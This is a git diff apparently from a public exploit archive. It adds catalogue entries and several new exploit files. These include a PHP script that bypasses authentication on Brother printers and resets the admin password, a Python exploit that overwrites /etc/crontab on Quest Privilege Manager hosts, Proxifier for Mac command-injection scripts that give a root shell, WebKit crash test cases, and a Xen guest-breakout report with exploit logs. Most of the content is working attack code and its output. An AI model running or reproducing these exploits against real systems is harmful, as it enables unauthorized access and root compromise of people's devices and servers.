diff --git a/files.csv b/files.csv index cc12d8038..761bccd8a 100644 --- a/files.csv +++ b/files.csv @@ -5463,6 +5463,9 @@ id,file,description,date,author,platform,type,port 41814,platforms/multiple/dos/41814.html,"Apple WebKit - 'WebCore::toJS' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 41823,platforms/windows/dos/41823.py,"CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)",2017-03-16,redr2e,windows,dos,0 41851,platforms/windows/dos/41851.txt,"Moxa MXview 2.8 - Denial of Service",2017-04-10,hyp3rlinx,windows,dos,0 +41867,platforms/multiple/dos/41867.html,"Apple WebKit - 'JSC::B3::Procedure::resetReachability' Use-After-Free",2017-04-11,"Google Security Research",multiple,dos,0 +41868,platforms/multiple/dos/41868.html,"Apple WebKit - 'Document::adoptNode' Use-After-Free",2017-04-11,"Google Security Research",multiple,dos,0 +41869,platforms/multiple/dos/41869.html,"Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow",2017-04-11,"Google Security Research",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -8928,6 +8931,9 @@ id,file,description,date,author,platform,type,port 41771,platforms/windows/local/41771.py,"Disk Sorter Enterprise 9.5.12 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0 41772,platforms/windows/local/41772.py,"DiskBoss Enterprise 7.8.16 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0 41773,platforms/windows/local/41773.py,"Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0 +41853,platforms/macos/local/41853.txt,"Proxifier for Mac 2.18 - Multiple Vulnerabilities",2017-04-11,Securify,macos,local,0 +41854,platforms/macos/local/41854.txt,"Proxifier for Mac 2.17 / 2.18 - Privesc Escalation",2017-04-11,"Mark Wadham",macos,local,0 +41870,platforms/multiple/local/41870.txt,"Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout",2017-04-11,"Google Security Research",multiple,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15429,6 +15435,7 @@ id,file,description,date,author,platform,type,port 41825,platforms/windows/remote/41825.txt,"SpiceWorks 7.5 TFTP - Remote File Overwrite / Upload",2017-04-05,hyp3rlinx,windows,remote,0 41850,platforms/windows/remote/41850.txt,"Moxa MXview 2.8 - Private Key Disclosure",2017-04-10,hyp3rlinx,windows,remote,0 41852,platforms/windows/remote/41852.txt,"Moxa MX AOPC-Server 1.5 - XML External Entity Injection",2017-04-10,hyp3rlinx,windows,remote,0 +41861,platforms/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,linux,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -37721,3 +37728,14 @@ id,file,description,date,author,platform,type,port 41845,platforms/php/webapps/41845.txt,"WordPress Plugin WHIZZ < 1.1.1 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,80 41846,platforms/php/webapps/41846.html,"WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,80 41849,platforms/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,php,webapps,0 +41855,platforms/xml/webapps/41855.sh,"Adobe Multiple Products - XML Injection File Content Disclosure",2017-04-07,"Thomas Sluyter",xml,webapps,8400 +41856,platforms/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",php,webapps,0 +41858,platforms/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",php,webapps,0 +41859,platforms/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' Parameter SQL Injection",2017-04-11,"Ihsan Sencan",php,webapps,0 +41857,platforms/php/webapps/41857.txt,"WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection",2017-04-11,"Manuel García Cárdenas",php,webapps,80 +41860,platforms/php/webapps/41860.txt,"MyBB < 1.8.11 - 'email' MyCode Cross-Site Scripting",2017-04-11,"Zhiyang Zeng",php,webapps,80 +41862,platforms/php/webapps/41862.txt,"MyBB smilie Module < 1.8.11 - 'pathfolder' Directory Traversal",2017-04-11,"Zhiyang Zeng",php,webapps,80 +41863,platforms/hardware/webapps/41863.php,"Brother MFC-J6520DW - Authentication Bypass / Password Change",2017-04-11,"Patryk Bogdan",hardware,webapps,0 +41864,platforms/php/webapps/41864.txt,"Horde Groupware Webmail 3 / 4 / 5 - Multiple Remote Code Execution",2017-04-11,SecuriTeam,php,webapps,0 +41865,platforms/multiple/webapps/41865.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting",2017-04-11,"Google Security Research",multiple,webapps,0 +41866,platforms/multiple/webapps/41866.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting via a Focus Event and a Link Element",2017-04-11,"Google Security Research",multiple,webapps,0 diff --git a/platforms/hardware/webapps/41863.php b/platforms/hardware/webapps/41863.php new file mode 100755 index 000000000..bedb5421f --- /dev/null +++ b/platforms/hardware/webapps/41863.php @@ -0,0 +1,204 @@ + ASCII hex --> md5 +(e.g. AuthCookie=c243a9ee18a9327bfd419f31e75e71c7 for 'test' password) + +This information can be used to crack current password from exported cookie. + +Fix: +Minimize network access to Brother MFC device or disable HTTP(S) interface. + +Confirmed vulnerable: +MFC-J6973CDW +MFC-J4420DW +MFC-8710DW +MFC-J4620DW +MFC-L8850CDW +MFC-J3720 +MFC-J6520DW +MFC-L2740DW +MFC-J5910DW +MFC-J6920DW +MFC-L2700DW +MFC-9130CW +MFC-9330CDW +MFC-9340CDW +MFC-J5620DW +MFC-J6720DW +MFC-L8600CDW +MFC-L9550CDW +MFC-L2720DW +DCP-L2540DW +DCP-L2520DW +HL-3140CW +HL-3170CDW +HL-3180CDW +HL-L8350CDW +HL-L2380DW +ADS-2500W +ADS-1000W +ADS-1500W + +For educational purposes only. + +*/ + + +/* ----------------------------- */ + +$address = "http://192.168.1.111"; + +//$mode = "silent"; + +$mode = "changepass"; +$newpass = "letmein"; + + +/* ----------------------------- */ + +$user_agent = 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0'; +$address = preg_replace('{/$}', '', $address); +libxml_use_internal_errors(true); + +function getPwdValue($address) { + + global $user_agent; + + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $address."/admin/password.html"); + curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); + curl_setopt($ch, CURLOPT_COOKIE, getCookie($address)); + curl_setopt($ch, CURLOPT_HEADER, 1); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); + $content = curl_exec($ch); + + $dom = new DOMDocument(); + $dom->loadHTML($content); + $inputs = $dom->getElementsByTagName('input'); + foreach($inputs as $i) { + if($i->getAttribute('id') === $i->getAttribute('name') && $i->getAttribute('type') === 'password') { + return $i->getAttribute('name'); + } + } + +} + +function getLogValue($address) { + + global $user_agent; + + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $address); + curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); + curl_setopt($ch, CURLOPT_HEADER, 1); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); + $content = curl_exec($ch); + + $dom = new DOMDocument(); + $dom->loadHTML($content); + + if(strstr($dom->getElementsByTagName('a')->item(0)->nodeValue, 'Please configure the password')) { + print 'Seems like password is not set! Exiting.'; exit; } + + $value = $dom->getElementById('LogBox')->getAttribute('name'); + return $value; + +} + +function getCookie($host) { + + global $address, $user_agent; + + $log_var = getLogValue($address); + + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $address."/general/status.html"); + curl_setopt($ch, CURLOPT_POST, 1); + curl_setopt($ch, CURLOPT_POSTFIELDS, + $log_var."=xyz&loginurl=%2Fgeneral%2Fstatus.html"); + curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); + curl_setopt($ch, CURLOPT_HEADER, 1); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); + $content = curl_exec($ch); + + if($content == true) { + $cookies = array(); + preg_match_all('/Set-Cookie:(?\s{0,}.*)$/im', $content, $cookies); + + if(!empty($cookies['cookie'])) { + $exploded = explode(';', $cookies['cookie'][0]); + } else { print 'Failed getting cookies for '.$address.' address - check your settings'; exit; } + } else { print 'Got error requesting '.$address.' address - check your settings'; exit; } + + return trim($exploded[0]); + +} + +if($mode === "silent") { + + print 'Here\'s your authorization cookie: '.getCookie($address); + +} elseif ($mode === "changepass") { + + global $address, $newpass; + + $cookie = getCookie($address); + $pwd_var = getPwdValue($address); + + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $address."/admin/password.html"); + curl_setopt($ch, CURLOPT_POST, 1); + curl_setopt($ch, CURLOPT_POSTFIELDS, + "pageid=1&".$pwd_var."=".$newpass."&temp_retypePass=".$newpass); + curl_setopt($ch, CURLOPT_COOKIE, $cookie); + curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); + curl_setopt($ch, CURLOPT_HEADER, 1); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); + $content = curl_exec($ch); + + if($content == true) { + print 'Password changed to: '.$newpass; + } else { print 'Got error requesting '.$address.' address - check your settings'; exit; } + +} + +?> diff --git a/platforms/linux/remote/41861.py b/platforms/linux/remote/41861.py new file mode 100755 index 000000000..41cfe124e --- /dev/null +++ b/platforms/linux/remote/41861.py @@ -0,0 +1,145 @@ +#!/usr/bin/env python2 + +""" +# Exploit Title: Quest Privilege Manager pmmasterd Arbitrary File Write +# Date: 10/Mar/2017 +# Exploit Author: m0t +# Vendor Homepage: https://www.quest.com/products/privilege-manager-for-unix/ +# Version: 6.0.0-27, 6.0.0-50 +# Tested on: ubuntu 14.04 x86_64, ubuntu 16.04 x86, ubuntu 12.04 x86 +# CVE : 2017-6554 + +REQUIREMENTS +- Root privs are required to bind a privileged source port +- python hexdump: pip install hexdump + + +This PoC gains arbitrary command execution by overwriting /etc/crontab +In case of successful exploitation /etc/crontab will contain the following line +* * * * * root touch /tmp/pwned + + +""" + +import binascii as b +import hexdump as h +import struct +import sys +import socket +from Crypto.Cipher import AES + +cipher=None +def create_enc_packet(action, len1=None, len2=None, body=None): + global cipher + if body == None: + body_raw = b.unhexlify("50696e6745342e362e302e302e32372e") + else: + body_raw = b.unhexlify(body) + #pad + if len(body_raw) % 16 != 0: + body_raw += "\x00" * (16 - (len(body_raw) % 16)) + enc_body = cipher.encrypt(body_raw) + + if len1 == None: + len1 = len(body_raw) + if len2 == None: + len2 = len(enc_body) + head = struct.pack('>I', action) + struct.pack('>I', len1) + struct.pack('>I', len2) + '\x00'*68 + return head+enc_body + +def decrypt_packet(packet): + global cipher + return cipher.decrypt(packet[80:]) + +def create_packet(action, len1=None, len2=None, body=None): + if body == None: + body = "50696e6745342e362e302e302e32372e" + if len1 == None: + len1 = len(body)/2 + if len2 == None: + len2 = len1 + head = struct.pack('>I', action) + struct.pack('>I', len1) + struct.pack('>I', len2) + '\x00'*68 + return head+b.unhexlify(body) + +#extract action code from first 4b, return action found +def get_action(packet): + code = struct.unpack('>I',packet[:4])[0] + return code + +def generate_aes_key(buf): + some_AES_bytes = [ + 0xDF, 0x4E, 0x34, 0x05, 0xF4, 0x4D, 0x19, 0x22, 0x98, 0x4F, + 0x58, 0x62, 0x2C, 0x2A, 0x54, 0x42, 0xAA, 0x76, 0x53, 0xD4, + 0xF9, 0xDC, 0x98, 0x90, 0x23, 0x49, 0x71, 0x12, 0xEA, 0x33, + 0x12, 0x63 + ]; + retbuf = "" + if len(buf) < 0x20: + print("[-] initial key buffer too small, that's bad") + return None + for i in range(0x20): + retbuf+= chr(ord(buf[i])^some_AES_bytes[i]) + return retbuf + +def main(): + global cipher + + if len(sys.argv) < 2: + print("usage: %s []" % sys.argv[0]) + sys.exit(-1) + + s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + if len(sys.argv) > 2: + sport = int(sys.argv[2]) + else: + sport = 666 + + s.bind(("0.0.0.0", sport)) + s.connect((sys.argv[1], 12345)) + + + try: + s.send(create_packet(0xfa, body=b.hexlify("/etc/crontab"))) + #s.send(create_packet(0x134)) + print("[+] sent ACT_NEWFILESENT") + resp=s.recv(1024) + h.hexdump(resp) + action=get_action(resp) + if action == 212: + print("[+] server returned 212, this is a good sign, press Enter to continue") + else: + print("[-] server returned %d, exploit will probably fail, press CTRL-C to exit or Enter to continue" % action) + sys.stdin.readline() + print("[+] exchanging DH pars") + dh="\x00"*63+"\x02" + s.send(dh) + dh=s.recv(1024) + h.hexdump(dh) + aes_key = generate_aes_key(dh) + print("[+] got AES key below:") + h.hexdump(aes_key) + cipher=AES.new(aes_key) + print("[+] press Enter to continue") + sys.stdin.readline() + + print("[+] sending:") + enc=create_enc_packet(0xfb, body=b.hexlify("* * * * * root touch /tmp/pwned\n")) + h.hexdump(enc) + s.send(enc ) + enc=create_enc_packet(0xfc, body="") + h.hexdump(enc) + s.send(enc ) + + print("[+] got:") + resp=s.recv(1024) + h.hexdump(resp) + print("[+] trying decrypt") + h.hexdump(decrypt_packet(resp)) + + s.close() + except KeyboardInterrupt: + s.close() + exit(-1) + +main() \ No newline at end of file diff --git a/platforms/macos/local/41853.txt b/platforms/macos/local/41853.txt new file mode 100755 index 000000000..dff12fe60 --- /dev/null +++ b/platforms/macos/local/41853.txt @@ -0,0 +1,61 @@ +Source: https://www.securify.nl/advisory/SFY20170401/multiple_local_privilege_escalation_vulnerabilities_in_proxifier_for_mac.html + +Abstract + +Multiple local privileges escalation vulnerabilities were found in the KLoader binary that ships with Proxifier. KLoader is responsible for loading a Kernel Extension (kext). KLoader is installed setuid root, it accepts one or two command line arguments that are used in a number of system commands. These arguments are used in an insecure manner allowing a local attacker to elevate its privileges. In addition, the environment is not properly sanitized, which also introduces a possibility to run arbitrary commands with elevated privileges. + +Tested versions + +These issues were successfully verified on Proxifier for Mac v2.18. + +Fix + +Proxifier v2.19 was released that addresses these issues. + +Introduction + +Proxifier is a program that allows network applications that do not support proxy servers to operate through a SOCKS or HTTPS proxy or a chain of proxy servers. Multiple privilege escalation vulnerabilities were found in the KLoader binary that ships with Proxifier. These vulnerabilities allow a local user to gain elevated privileges (root). + +KLoader is responsible for loading the ProxifierS.kext Kernel Extension (kext). Loading kext files requires root privileges. Because of this the setuid bit is set on this binary when Proxifier is started for the first time. KLoader accepts one or two command line arguments that are used in a number of system commands. These arguments are used in an insecure manner allowing a local attacker to elevate its privileges. In addition, the environment is not properly sanitized, which also introduces a possibility to run arbitrary commands with elevated privileges. + +Unsanitized PATH environment variable + +The KLoader binary executes a number of system commands. The commands are executed from a relative path. The PATH environment variable is not sanitized before these commands are run. The PATH variable is changed by KLoader, but all that happens is that a hardcoded path is appended to current value of PATH. Due to this, it is possible for a local attacker to set an arbitrary PATH variable such that the attacker's folder is search first. Commands that are started from a relative path - and thus allow for privileges escalation - include: + +- cp +- mkdir +- tar +- kextstat +- kextload + +Proof of concept + +cd /tmp +export PATH=.:$PATH +echo -e "#/bin/bash\nid" > cp +chmod +x cp +/Applications/Proxifier.app/Contents/KLoader lpe + +Command injection in KLoader + +The command line arguments that are passed to Kloader are not validated and/or sanitized. These arguments are used as-is when construction system commands. This allows an local attacker to cause Kloader to execute arbitrary commands with root privileges. + +Proof of concept + +$ /Applications/Proxifier.app/Contents/KLoader ';id #' +usage: cp [-R [-H | -L | -P]] [-fi | -n] [-apvX] source_file target_file +cp [-R [-H | -L | -P]] [-fi | -n] [-apvX] source_file ... target_directory +uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),[...] + +Loading of arbitrary kext files + +The main purpose of KLoader is to load ProxifierS.kext. The first command line argument is the path to the kext file, which normally is /Applications/Proxifier.app/Contents/ProxifierS.kext/. However since the first argument can be fully controlled by an attacker it is actually possible for a local unprivileged user to load any arbitrary kext file. The proof of concept below tries to OSXPMem Kernel Extension from the Rekall Forensic Framework. + +Proof of concept + +curl -L https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip --output osxpmem-2.1.post4.zip +unzip osxpmem-2.1.post4.zip +cd osxpmem.app/MacPmem.kext/ +tar cvzf lpe.tar.gz Contents/ +/Applications/Proxifier.app/Contents/KLoader lpe.tar.gz +kextstat -l -b com.google.MacPmem \ No newline at end of file diff --git a/platforms/macos/local/41854.txt b/platforms/macos/local/41854.txt new file mode 100755 index 000000000..06dfd009e --- /dev/null +++ b/platforms/macos/local/41854.txt @@ -0,0 +1,51 @@ +# Source: https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html + +Proxifier 2.18 (also 2.17 and possibly some earlier version) ships with a +KLoader binary which it installs suid root the first time Proxifier is run. This +binary serves a single purpose which is to load and unload Proxifier's kernel +extension. + +Unfortunately it does this by taking the first parameter passed to it on the +commandline without any sanitisation and feeding it straight into system(). + +This means not only can you load any arbitrary kext as a non-root user but you +can also get a local root shell. + +Although this is a bit of a terrible bug that shouldn't be happening in 2017, +Proxifier's developers fixed the issue in record time so that's something! + +Everyone using Proxifier for Mac should update to 2.19 as soon as possible. + +https://m4.rkw.io/proxifier_privesc.sh.txt +6040180f672a2b70511a483e4996d784f03e04c624a8c4e01e71f50709ab77c3 +------------------------------------------------------------------- + +#!/bin/bash + +##################################################################### +# Local root exploit for vulnerable KLoader binary distributed with # +# Proxifier for Mac v2.18 # +##################################################################### +# by m4rkw # +##################################################################### + +cat > a.c < +#include + +int main() +{ + setuid(0); + seteuid(0); + + execl("/bin/bash", "bash", NULL); + return 0; +} +EOF + +gcc -o /tmp/a a.c +rm -f a.c +/Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel /tmp/a ; chmod 4755 /tmp/a' +/tmp/a + +------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/multiple/dos/41867.html b/platforms/multiple/dos/41867.html new file mode 100755 index 000000000..2c83166b9 --- /dev/null +++ b/platforms/multiple/dos/41867.html @@ -0,0 +1,135 @@ + + +(function () { + for (var i = 0; i < 1000000; ++i) { + const v = Array & 1 ? v : 1; + typeof o <= 'object'; + } +}()); + + \ No newline at end of file diff --git a/platforms/multiple/dos/41868.html b/platforms/multiple/dos/41868.html new file mode 100755 index 000000000..0e1e5e4df --- /dev/null +++ b/platforms/multiple/dos/41868.html @@ -0,0 +1,185 @@ + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/41869.html b/platforms/multiple/dos/41869.html new file mode 100755 index 000000000..eb045c109 --- /dev/null +++ b/platforms/multiple/dos/41869.html @@ -0,0 +1,151 @@ + + +(function (x = 0) { + var a; + { + function arguments() { + } + + function b() { + var g = 1; + a[5]; + } + + f(); + g(); + } +}()); + + \ No newline at end of file diff --git a/platforms/multiple/local/41870.txt b/platforms/multiple/local/41870.txt new file mode 100755 index 000000000..3997ca064 --- /dev/null +++ b/platforms/multiple/local/41870.txt @@ -0,0 +1,222 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1184 + +This bug report describes a vulnerability in memory_exchange() that +permits PV guest kernels to write to an arbitrary virtual address with +hypervisor privileges. The vulnerability was introduced through a +broken fix for CVE-2012-5513 / XSA-29. + +The fix for CVE-2012-5513 / XSA-29 introduced the following check in +the memory_exchange() hypercall handler: + + if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) || + !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) ) + { + rc = -EFAULT; + goto fail_early; + } + +guest_handle_okay() calls array_access_ok(), which calls access_ok(), +which is implemented as follows: + + /* + * Valid if in +ve half of 48-bit address space, or above + * Xen-reserved area. + * This is also valid for range checks (addr, addr+size). As long + * as the start address is outside the Xen-reserved area then we + * will access a non-canonical address (and thus fault) before + * ever reaching VIRT_START. + */ + #define __addr_ok(addr) \ + (((unsigned long)(addr) < (1UL<<47)) || \ + ((unsigned long)(addr) >= HYPERVISOR_VIRT_END)) + + #define access_ok(addr, size) \ + (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size)) + +As the comment states, access_ok() only checks the address, not the +size, if the address points to guest memory, based on the assumption +that any caller of access_ok() will access guest memory linearly, +starting at the supplied address. Callers that want to access a +subrange of the memory referenced by a guest handle are supposed to +use guest_handle_subrange_okay(), which takes an additional start +offset parameter, instead of guest_handle_okay(). + +memory_exchange() uses guest_handle_okay(), but only accesses the +guest memory arrays referenced by exch.in.extent_start and +exch.out.extent_start starting at exch.nr_exchanged, a 64-bit offset. +The intent behind exch.nr_exchanged is that guests always set it to 0 +and nonzero values are only set when a hypercall has to be restarted +because of preemption, but this isn't enforced. + +Therefore, by invoking this hypercall with crafted arguments, it is +possible to write to an arbitrary memory location that is encoded as + + exch.out.extent_start + 8 * exch.nr_exchanged + +where exch.out.extent_start points to guest memory and +exch.nr_exchanged is an attacker-chosen 64-bit value. + + +I have attached a proof of concept. This PoC demonstrates the issue by +overwriting the first 8 bytes of the IDT entry for #PF, causing the +next pagefault to doublefault. To run the PoC, unpack it in a normal +64-bit PV domain and run the following commands in the domain as root: + +root@pv-guest:~# cd crashpoc +root@pv-guest:~/crashpoc# make -C /lib/modules/$(uname -r)/build M=$(pwd) +make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic' + LD /root/crashpoc/built-in.o + CC [M] /root/crashpoc/module.o +nasm -f elf64 -o /root/crashpoc/native.o /root/crashpoc/native.asm + LD [M] /root/crashpoc/test.o + Building modules, stage 2. + MODPOST 1 modules +WARNING: could not find /root/crashpoc/.native.o.cmd for /root/crashpoc/native.o + CC /root/crashpoc/test.mod.o + LD [M] /root/crashpoc/test.ko +make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic' +root@pv-guest:~/crashpoc# insmod test.ko +root@pv-guest:~/crashpoc# rmmod test + +The machine on which I tested the PoC was running Xen 4.6.0-1ubuntu4 +(from Ubuntu 16.04.2). Executing the PoC caused the following console +output: + +(XEN) *** DOUBLE FAULT *** +(XEN) ----[ Xen-4.6.0 x86_64 debug=n Tainted: C ]---- +(XEN) CPU: 0 +(XEN) RIP: e033:[<0000557b46f56860>] 0000557b46f56860 +(XEN) RFLAGS: 0000000000010202 CONTEXT: hypervisor +(XEN) rax: 00007fffe9cfafd0 rbx: 00007fffe9cfd160 rcx: 0000557b47ebd040 +(XEN) rdx: 0000000000000001 rsi: 0000000000000004 rdi: 0000557b47ec52e0 +(XEN) rbp: 00007fffe9cfd158 rsp: 00007fffe9cfaf30 r8: 0000557b46f7df00 +(XEN) r9: 0000557b46f7dec0 r10: 0000557b46f7df00 r11: 0000557b47ec5878 +(XEN) r12: 0000557b47ebd040 r13: 00007fffe9cfb0c0 r14: 0000557b47ec52e0 +(XEN) r15: 0000557b47ed5e70 cr0: 0000000080050033 cr4: 00000000001506a0 +(XEN) cr3: 0000000098e2e000 cr2: 00007fffe9cfaf93 +(XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: e02b cs: e033 +(XEN) +(XEN) **************************************** +(XEN) Panic on CPU 0: +(XEN) DOUBLE FAULT -- system shutdown +(XEN) **************************************** +(XEN) +(XEN) Reboot in five seconds... + + +I strongly recommend changing the semantics of access_ok() so that it +guarantees that any access to an address inside the specified range is +valid. Alternatively, add some prefix, e.g. "UNSAFE_", to the names of +access_ok() and appropriate wrappers to prevent people from using +these functions improperly. Currently, in my opinion, the function +name access_ok() is misleading. + +Proof of Concept: xen_memory_exchange_crashpoc.tar + +################################################################################ + +I have written an exploit (attached). + +Usage (in an unprivileged PV guest with kernel headers, gcc, make, nasm and hexdump): + + +root@pv-guest:~/privesc_poc# ./compile.sh +make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic' + LD /root/privesc_poc/built-in.o + CC [M] /root/privesc_poc/module.o +nasm -f elf64 -o /root/privesc_poc/native.o /root/privesc_poc/native.asm + LD [M] /root/privesc_poc/test.o + Building modules, stage 2. + MODPOST 1 modules +WARNING: could not find /root/privesc_poc/.native.o.cmd for /root/privesc_poc/native.o + CC /root/privesc_poc/test.mod.o + LD [M] /root/privesc_poc/test.ko +make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic' +root@pv-guest:~/privesc_poc# ./attack 'id > /tmp/owned_by_the_guest' +press enter to continue + +root@pv-guest:~/privesc_poc# + + +dmesg in the unprivileged PV guest: + + +[ 721.413415] call_int_85 at 0xffffffffc0075a90 +[ 721.420167] backstop_85_handler at 0xffffffffc0075a93 +[ 722.801566] PML4 at ffff880002fe3000 +[ 722.808216] PML4 entry: 0x13bba4067 +[ 722.816161] ### trying to write crafted PUD entry... +[ 722.824178] ### writing byte 0 +[ 722.832193] write_byte_hyper(ffff88007a491008, 0x7) +[ 722.840254] write_byte_hyper successful +[ 722.848234] ### writing byte 1 +[ 722.856170] write_byte_hyper(ffff88007a491009, 0x80) +[ 722.864219] write_byte_hyper successful +[ 722.872241] ### writing byte 2 +[ 722.880215] write_byte_hyper(ffff88007a49100a, 0x35) +[ 722.889014] write_byte_hyper successful +[ 722.896232] ### writing byte 3 +[ 722.904265] write_byte_hyper(ffff88007a49100b, 0x6) +[ 722.912599] write_byte_hyper successful +[ 722.920246] ### writing byte 4 +[ 722.928270] write_byte_hyper(ffff88007a49100c, 0x0) +[ 722.938554] write_byte_hyper successful +[ 722.944231] ### writing byte 5 +[ 722.952239] write_byte_hyper(ffff88007a49100d, 0x0) +[ 722.961769] write_byte_hyper successful +[ 722.968221] ### writing byte 6 +[ 722.976219] write_byte_hyper(ffff88007a49100e, 0x0) +[ 722.984319] write_byte_hyper successful +[ 722.992233] ### writing byte 7 +[ 723.000234] write_byte_hyper(ffff88007a49100f, 0x0) +[ 723.008341] write_byte_hyper successful +[ 723.016254] ### writing byte 8 +[ 723.024357] write_byte_hyper(ffff88007a491010, 0x0) +[ 723.032254] write_byte_hyper successful +[ 723.040236] ### crafted PUD entry written +[ 723.048199] dummy +[ 723.056199] going to link PMD into target PUD +[ 723.064238] linked PMD into target PUD +[ 723.072206] going to unlink mapping via userspace PUD +[ 723.080230] mapping unlink done +[ 723.088251] copying HV and user shellcode... +[ 723.096283] copied HV and user shellcode +[ 723.104270] int 0x85 returned 0x7331 +[ 723.112237] remapping paddr 0x13bb86000 to vaddr 0xffff88000355a800 +[ 723.120192] IDT entry for 0x80 should be at 0xffff83013bb86800 +[ 723.128226] remapped IDT entry for 0x80 to 0xffff804000100800 +[ 723.136260] IDT entry for 0x80: addr=0xffff82d08022a3d0, selector=0xe008, ist=0x0, p=1, dpl=3, s=0, type=15 +[ 723.144291] int 0x85 returned 0x1337 +[ 723.152235] === END === + + +The supplied shell command executes in dom0 (and all other 64bit PV domains): + + +root@ubuntu:~# cat /tmp/owned_by_the_guest +uid=0(root) gid=0(root) groups=0(root) +root@ubuntu:~# + + +Note that the exploit doesn't clean up after itself - shutting down the attacking domain will panic the hypervisor. + + +I have tested the exploit in the following configurations: + +configuration 1: +running inside VMware Workstation +Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)" +dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu +unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu + +configuration 2: +running on a physical machine with Qubes OS 3.1 installed +Xen version 4.6.3 + +Proof of Concept: privesc_poc.tar.gz + +################################################################################ + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41870.zip + diff --git a/platforms/multiple/webapps/41865.html b/platforms/multiple/webapps/41865.html new file mode 100755 index 000000000..2e86061f0 